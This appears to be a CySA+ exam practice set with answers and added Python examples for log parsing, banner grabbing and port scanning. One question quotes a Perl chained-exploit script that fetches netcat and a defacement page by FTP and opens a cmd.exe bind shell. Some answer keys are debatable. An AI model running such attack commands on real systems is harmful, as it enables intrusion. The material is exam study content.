CySA+ PT 2
Consider the following REGEX search string:

\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b

Which of the following strings would NOT be included in the output of this search?
37.259.129.207. The logical shortcut is to look at the answers first and see that they all look like IP addresses. Remember that grep and REGEX are used by a cybersecurity analyst to search logs for indicators of compromise (like an IP address), so don't be afraid to take a logical guess if you need to conserve time during your exam. So which one isn't a valid IP address? 37.259.129.207 cannot be one, because an octet can never exceed 255, and the regex encodes exactly that limit: each octet alternative matches 250-255 (25[0-5]), 200-249 (2[0-4][0-9]) or 0-199 ([01]?[0-9][0-9]?), so the octet 259 has no way to match. If you had to guess which string would not be output by this complex-looking search, you should guess that one.
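As an added example (not part of the original question set), here is the regex above run with Python's re module over a few constructed log lines. It shows the exam point (an octet of 259 can never match) and one caveat the question leaves out: \b only asserts a word boundary, so a dotted string with more than four groups still produces a "match" on its first four groups. The log lines are made up for the example.

```python
import re

# The IPv4 pattern from the question, assembled from one octet alternative:
# 25[0-5] -> 250-255, 2[0-4][0-9] -> 200-249, [01]?[0-9][0-9]? -> 0-199.
OCTET = r"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
IPV4_RE = re.compile(r"\b" + OCTET + r"\." + OCTET + r"\." + OCTET + r"\." + OCTET + r"\b")

# Constructed sample lines (not from a real system); the third contains the
# invalid octet 259, the fourth a five-group dotted string.
SAMPLE_LOG = """\
Jan 11 05:52:56 fw kernel: DROP SRC=10.1.0.102 DST=10.1.0.10 DPT=23
Jan 11 05:53:01 fw sshd[2201]: Failed password from 203.0.113.254 port 51822
Jan 11 05:53:07 fw proxy: blocked outbound to 37.259.129.207 (octet > 255)
Jan 11 05:53:09 fw proxy: allowed outbound to 198.51.100.7.20 (five groups)
"""

def extract_ipv4(text):
    """Return every substring the regex matches, in order (what grep -oE would print)."""
    return [m.group(0) for m in IPV4_RE.finditer(text)]

def is_ipv4(candidate):
    """True only when the entire candidate matches, not just a substring of it."""
    return IPV4_RE.fullmatch(candidate) is not None

def matches_in_sample():
    return extract_ipv4(SAMPLE_LOG)

if __name__ == "__main__":
    for ip in matches_in_sample():
        print(ip)
    # 37.259.129.207 never appears; 198.51.100.7.20 shows up truncated to 198.51.100.7
```

When you need the whole token to be an address (for example when validating a field rather than searching free text), use fullmatch or anchor the pattern with ^ and $ instead of relying on \b.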
Your organization has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what key performance indicator (KPI) could you use?
Alert volume. An increase in alert volume may correlate with an increase in detected incidents.
Evaluate the following log entry:

Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0

Based on this log entry, which of the following statements are true?
An attempted connection to the telnet service was prevented, and the packet was blocked inbound. DPT=23 is telnet; the SYN flag with no ACK marks the first packet of a TCP handshake, so this is a new connection attempt; and IN=eth0 with an empty OUT= means the packet arrived on eth0 and was dropped by the host's INPUT chain before it reached the service. The leading words "iptables INPUT drop" are whatever the administrator set with --log-prefix; the KEY=VALUE fields after them are the fixed netfilter log format.
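As an added example (not from the original page), a small parser for netfilter LOG lines that turns the entry above into the facts an analyst states about it: chain, action, direction, destination service, whether it is a new connection attempt, and the layer-2 addresses packed into the MAC= field. The log line is a constructed copy of the one in the question; the port-to-service table is an assumption of the example, not a complete list.

```python
# Constructed copy of the log line from the question (field values as shown there).
LOG_LINE = ("Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= "
            "MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 "
            "LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 "
            "WINDOW=64240 RES=0x00 SYN URGP=0")

TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}
CHAINS = {"INPUT", "OUTPUT", "FORWARD"}
ACTIONS = {"drop", "accept", "reject"}
# Assumed port-to-service map for the summary (not exhaustive).
SERVICES = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 80: "http", 443: "https"}

def parse_iptables_line(line):
    """Split a netfilter LOG line into the admin-chosen --log-prefix words,
    KEY=VALUE fields, and bare flag tokens (DF, SYN, ACK, ...)."""
    _, _, body = line.partition("kernel: ")
    rec = {"prefix": [], "fields": {}, "flags": set()}
    for tok in body.split():
        if "=" in tok:
            key, _, value = tok.partition("=")
            rec["fields"][key] = value
        elif tok in TCP_FLAGS or tok == "DF":
            rec["flags"].add(tok)
        else:
            rec["prefix"].append(tok)
    return rec

def decode_mac_field(mac_field):
    """netfilter packs destination MAC, source MAC and EtherType into one MAC= field."""
    parts = mac_field.split(":")
    if len(parts) != 14:
        return None
    return {"dst_mac": ":".join(parts[0:6]),
            "src_mac": ":".join(parts[6:12]),
            "ethertype": "".join(parts[12:14])}   # 0800 = IPv4

def summarize(rec):
    """Turn the parsed record into the facts an analyst wants to state about it."""
    f, flags, prefix = rec["fields"], rec["flags"], rec["prefix"]
    chain = next((p for p in prefix if p in CHAINS), None)
    action = next((p.lower() for p in prefix if p.lower() in ACTIONS), None)
    if f.get("IN") and not f.get("OUT"):
        direction = "inbound"        # arrived on IN=, no OUT= interface: INPUT path
    elif f.get("OUT") and not f.get("IN"):
        direction = "outbound"       # OUTPUT path: generated by this host
    else:
        direction = "forwarded"      # both interfaces set: FORWARD path
    dport = int(f["DPT"]) if "DPT" in f else None
    return {
        "chain": chain,
        "action": action,
        "direction": direction,
        "proto": f.get("PROTO"),
        "src": f.get("SRC"), "dst": f.get("DST"),
        "dst_port": dport,
        "service": SERVICES.get(dport, "unknown"),
        # SYN without ACK is the first packet of a handshake: a new connection attempt
        "new_connection": f.get("PROTO") == "TCP" and "SYN" in flags and "ACK" not in flags,
        "l2": decode_mac_field(f.get("MAC", "")),
    }

if __name__ == "__main__":
    print(summarize(parse_iptables_line(LOG_LINE)))
```

The same parser works for ACCEPT or REJECT log rules because the prefix words are matched case-insensitively against the action set; only the --log-prefix text the administrator chose differs between rules.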
Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect if an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?
Behavior. Behavioral analysis compares activity against a baseline of what is normal for a user or location; an employee from one office logging into a workstation in another state is a deviation from that baseline rather than a match on a known signature.
What technology is NOT PKI X.509 compliant and cannot be used in various secure functions?
Blowfish. Blowfish is a standalone symmetric block cipher that is not part of the X.509 PKI standards, whereas AES (as the bulk cipher in PKCS envelopes and SSL/TLS cipher suites), PKCS, and SSL/TLS are all used with X.509 certificates.
A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the web server. While the msadc.pl script is effective, the pentester found it too monotonous to use for extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:

system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");
system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\"");
$o=<STDIN>;
print "Opening FTP connection...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");

Which exploit is indicated by this script?
Chained exploit. The script combines several attacks into one: it uses msadc.pl (the MDAC/RDS command-execution exploit for IIS 4.0) to write an FTP command file line by line on the target, runs ftp -s: against that file to pull nc.exe and hacked.html onto the server, and then starts netcat listening on $port with cmd.exe bound to it for a remote shell. Chained exploits integrate more than one form of attack to accomplish their goal.
You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port to 636 wherever possible. What should you do?
Change all devices and servers that support it to port 636, since LDAP over SSL/TLS (LDAPS) runs on port 636 by default while plain LDAP on port 389 carries simple binds, and the passwords in them, in cleartext. (StartTLS can also protect LDAP on 389, but the scanner's recommendation here is LDAPS.)
Jeff has been contacted by an external security company and told that they had found a copy of his company's proprietary source code on GitHub. Upon further investigation, Jeff has determined that his organization owns the repository where the source code is located. Which of the following mitigations should Jeff apply immediately?
Change the repository from public to private. That stops further exposure immediately; anything already in the repository, including any credentials or keys committed to its history, should then be treated as disclosed and rotated.
Which of the following is NOT considered a phase in the incident response cycle?
Communication/Notification. The incident response cycle (NIST SP 800-61) is preparation; detection and analysis; containment, eradication and recovery; and post-incident activity. Communication and notification happen throughout those phases rather than forming a phase of their own.
A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system's kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network?
Conduct an OS fingerprinting scan across the network (for example with nmap's -O option) to identify every host running the affected operating system; without a current asset inventory, active discovery is the only reliable way to find them all.
Which of the following actions should be done FIRST after forensically imaging a hard drive for evidence in an investigation?
Create a hash digest of the source drive and the image file to ensure they match
Which of the following automatically combines multiple disparate sources of information to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?
Data enrichment.
Your organization is a financial services company. You have a team of security analysts who are responsible for gathering and analyzing intelligence about potential threats to your organization. The analysts recently published a report that identifies a new threat actor who is targeting financial services companies. The report includes information about the threat actor's tactics, techniques, and procedures (TTPs). In which phase of the security intelligence cycle will this information be provided to those who need to act on it?
Dissemination
Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host?
FTP. An FTP client speaks only the FTP protocol and cannot request an HTTP response; tools such as netcat, telnet, or wget/curl can connect to the web server's port and read the Server header it returns.
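As an added example (not from the original page), the banner grab done by hand in Python: open a plain TCP socket, send one HEAD request the way you would type it into netcat or telnet, and pull the Server header out of the reply. So that it runs offline, the target is a constructed local http.server instance; the hostname, port and handler class are assumptions of the example.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

class _TargetHandler(BaseHTTPRequestHandler):
    """Constructed target: a minimal local web server so the grab runs offline."""
    def do_HEAD(self):
        self.send_response(200)              # adds Server: and Date: headers
        self.send_header("Content-Type", "text/html")
        self.end_headers()
    do_GET = do_HEAD
    def log_message(self, *args):            # keep the server quiet
        pass

def start_local_target():
    """Start a throwaway HTTP server on 127.0.0.1; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), _TargetHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]

def grab_http_banner(host, port, timeout=3.0):
    """Open a plain TCP socket, send one HEAD request and return the raw reply.
    This is what typing the request into 'nc host 80' or 'telnet host 80' does."""
    request = b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n"
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:                     # HTTP/1.0: server closes after the reply
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")

def parse_server_header(raw_reply):
    """Return the Server: header value (the banner) from a raw HTTP reply, or None."""
    head = raw_reply.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:      # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None

def demo_local_grab():
    """Spin up the local target, grab its banner and shut it down again."""
    srv, port = start_local_target()
    try:
        return parse_server_header(grab_http_banner("127.0.0.1", port))
    finally:
        srv.shutdown()
        srv.server_close()

if __name__ == "__main__":
    print(demo_local_grab())   # prints the Server header, e.g. BaseHTTP/0.6 Python/3.x
```

Against a real host, grab_http_banner("target", 80) does the same thing; note that many servers strip or falsify the Server header, so the banner is a hint for further enumeration, not proof of the software version.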
Which of the following vulnerabilities was considered the MOST critical because of its potential for a high degree of impact and exploitability?
Heartbleed. Heartbleed (CVE-2014-0160) was a bug in OpenSSL's TLS heartbeat extension that let any unauthenticated client read up to 64 KB of the peer's process memory per request, exposing private keys, session cookies and passwords, which is why both its impact and its exploitability were rated so highly.
How does timely and effective communication and reporting of vulnerabilities assist an organization in meeting the GDPR's requirement of reporting data breaches within 72 hours of detection?
It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority
Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role?
MSSP. A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings.
Due to new regulations, your organization's CIO has the information security team institute a vulnerability management program. What framework would BEST support this program's establishment?
NIST. NIST's publications (for example SP 800-40 on enterprise patch management) provide the framework on which a vulnerability management program can be established and run.
You are reviewing the latest list of important web application security controls published by OWASP. Which of these items is LEAST likely to appear on that list?
Obscure web interface locations. Hiding the location of an interface is security through obscurity, which OWASP does not list as a control, so it is the least likely item to appear.
During your review of the firewall logs, you notice that an IP address from within your company's server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident?
PII of company employees and customers was exfiltrated
An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account's cached credentials when the user logged into an SSO system?
Pass the hash. In a pass-the-hash attack the attacker harvests the cached NTLM password hash of an account and reuses the hash itself to authenticate, without ever knowing the plaintext password.
During a collaboration between a startup and a multinational corporation, the signed Memorandum of Understanding (MOU) has placed some limitations on the startup's system access. What could this potentially lead to?
Potentially restricting ability to fully remediate vulnerabilities
You are in the recovery steps of an incident response. Throughout the incident, your team never successfully determined the root cause of the network compromise. Which of the following options would you LEAST likely perform as part of your recovery and remediation actions?
Proactively sanitize and reimage all of your routers and switches
In 2013, retail giant Target Corporation experienced a massive data breach, exposing the credit and debit card information of 40 million customers. Following this security incident, a special team was tasked with investigating the fundamental cause of the breach, uncovering the sequence of events that led to it, and providing insights to prevent such occurrences in the future. What term best describes this deep-dive investigative process?
Root cause analysis
Which of the following frameworks is commonly used for sharing threat intelligence information in a standardized format?
STIX. STIX (Structured Threat Information eXpression) is a standardized language for representing and sharing threat intelligence; TAXII is the companion protocol used to transport it.
Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?
Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability
Which of the following is a best practice that should be followed when scheduling vulnerability scans of an organization's data center?
Schedule scans to run during periods of low activity
You just completed an nmap scan against a workstation and received the following output:

# nmap diontraining012
Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports
PORT    STATE
135/tcp open
139/tcp open
445/tcp open
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds

Based on these results, which of the following operating systems is most likely being run by this workstation?
The workstation is most likely running a version of the Windows operating system. Port 135/tcp is the Microsoft RPC endpoint mapper, and ports 139/tcp (NetBIOS session service) and 445/tcp (SMB over TCP) are the file and printer sharing services run by Windows. Ports 139 and 445 alone could also be a Samba server on Linux, so 135 is the strongest Windows indicator here; nmap -O or -sV would confirm it.
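As an added example (not from the original page), a parser for nmap's port table plus the port-based reasoning above written out as a heuristic, including the Samba hedge. The scan output is the question's, reproduced as a constructed string; the port-to-evidence tables are assumptions of the example, not nmap's own service database.

```python
import re

# The scan output from the question, reproduced here as a constructed string.
NMAP_OUTPUT = """\
Starting Nmap ( http://nmap.org )
Nmap scan report for diontraining012 (192.168.14.61)
Not shown: 997 filtered ports
PORT    STATE
135/tcp open
139/tcp open
445/tcp open
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
"""

# Matches nmap's port table lines, with or without the SERVICE column.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered|open\|filtered)\b")

# Assumed port-to-evidence tables for the heuristic (not nmap's own database).
WINDOWS_SPECIFIC = {135: "msrpc endpoint mapper", 3389: "ms-wbt-server (RDP)"}
SMB_FAMILY = {139: "netbios-ssn", 445: "microsoft-ds (SMB)"}
UNIX_HINTS = {22: "ssh", 111: "rpcbind"}

def parse_open_ports(text):
    """Return [(port, proto), ...] for every line nmap reported as open."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2)))
    return ports

def guess_os(open_ports):
    """Port-based OS heuristic; returns (verdict, evidence). This is a first cut only:
    nmap -O (TCP/IP stack fingerprinting) or -sV (service banners) confirms it."""
    tcp = {p for p, proto in open_ports if proto == "tcp"}
    tables = {**WINDOWS_SPECIFIC, **SMB_FAMILY, **UNIX_HINTS}
    evidence = [f"{p}/tcp {tables[p]}" for p in sorted(tcp) if p in tables]
    if tcp & set(WINDOWS_SPECIFIC):
        return "Windows", evidence
    if tcp & set(SMB_FAMILY):
        # 139/445 without 135 could be Samba on Linux, so hedge when ssh is also open.
        if tcp & set(UNIX_HINTS):
            return "Windows or Samba on a Unix-like host", evidence
        return "Windows (probable)", evidence
    if tcp & set(UNIX_HINTS):
        return "Unix-like", evidence
    return "unknown", evidence

def verdict_for_sample():
    return guess_os(parse_open_ports(NMAP_OUTPUT))

if __name__ == "__main__":
    print(verdict_for_sample())
```

The verdict only becomes "Windows" outright when a Windows-specific port such as 135 is open; with just the SMB pair the function deliberately stays tentative, which is the reasoning behind the answer above.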
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment?
Virtualization. A single physical host can run a virtual machine for each operating system in use, so every patch can be tested against the matching OS before it is released to the patch management system.
What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker?
Zone transfers. A zone transfer (AXFR) copies all of a zone's records from a primary DNS server to a secondary. An attacker who can request one from a misconfigured server obtains a complete map of the zone's hostnames and addresses, so transfers should be restricted to authorized secondary servers.
A cybersecurity analyst has received an alert that sensors continuously observe well-known call home messages at their network boundary. Still, the organization's proxy firewall is properly configured and successfully drops the messages before they leave the network. Which of the following is MOST likely the cause of the call home messages being sent?
An infected workstation is attempting to reach a command and control server. The repeated outbound beacons are the malware trying to check in; the proxy dropping them contains the C2 channel but does not remove the infection, so the workstation still has to be identified and remediated.
You are conducting a quick nmap scan of a target network. You want to conduct an SYN scan, but you don't have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation?
nmap -sT. The TCP connect scan (-sT) uses the operating system's connect() call to complete a full three-way handshake, so it works without raw socket privileges; the SYN (half-open) scan, -sS, crafts raw packets and requires root or administrator rights. This is also why nmap silently substitutes a connect scan for its default SYN scan when run unprivileged.
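As an added example (not from the original page), the mechanism behind -sT written out with Python's socket module: each port is probed with an ordinary connect() call, which needs no special privilege but completes the handshake on every open port, so the listening service sees the connection. The targets are constructed loopback listeners so the scan runs offline; the function and port names are assumptions of the example.

```python
import errno
import socket

def open_listener(host="127.0.0.1"):
    """Constructed target: a listening socket on an ephemeral port; returns (sock, port)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    s.listen(5)
    return s, s.getsockname()[1]

def connect_scan(host, ports, timeout=0.5):
    """What nmap -sT does: ask the OS to connect() to each port. No raw sockets are
    needed, but every open port sees a completed three-way handshake, so the target
    service (and its logs) observe the scan; a SYN scan (-sS) never completes it."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                err = s.connect_ex((host, port))   # 0 on success, else an errno value
            except OSError:
                err = None
            if err == 0:
                results[port] = "open"
            elif err == errno.ECONNREFUSED:       # RST came back: nothing listening
                results[port] = "closed"
            else:                                 # no answer or another error
                results[port] = "filtered"
    return results

def count_completed_handshakes(listener, wait=0.2):
    """Drain the listener's accept queue. Each accepted socket is a handshake the
    'service' completed, which is what makes a connect scan easy to spot in logs."""
    listener.settimeout(wait)
    count = 0
    while True:
        try:
            conn, _ = listener.accept()
        except socket.timeout:
            return count
        conn.close()
        count += 1

def demo_scan():
    """Scan one open and one closed loopback port; returns the results and the
    number of handshakes the open port's listener saw."""
    listener, open_port = open_listener()
    probe, closed_port = open_listener()
    probe.close()                      # free the port so it now answers with RST
    try:
        results = connect_scan("127.0.0.1", [open_port, closed_port])
        return {"results": results, "open_port": open_port, "closed_port": closed_port,
                "handshakes_seen": count_completed_handshakes(listener)}
    finally:
        listener.close()

if __name__ == "__main__":
    print(demo_scan())
```

The handshake count is the practical difference between the two scan types: a service behind the open port accepted a real connection from the scanner, which is exactly what a SYN scan avoids by answering the SYN/ACK with a RST instead of an ACK.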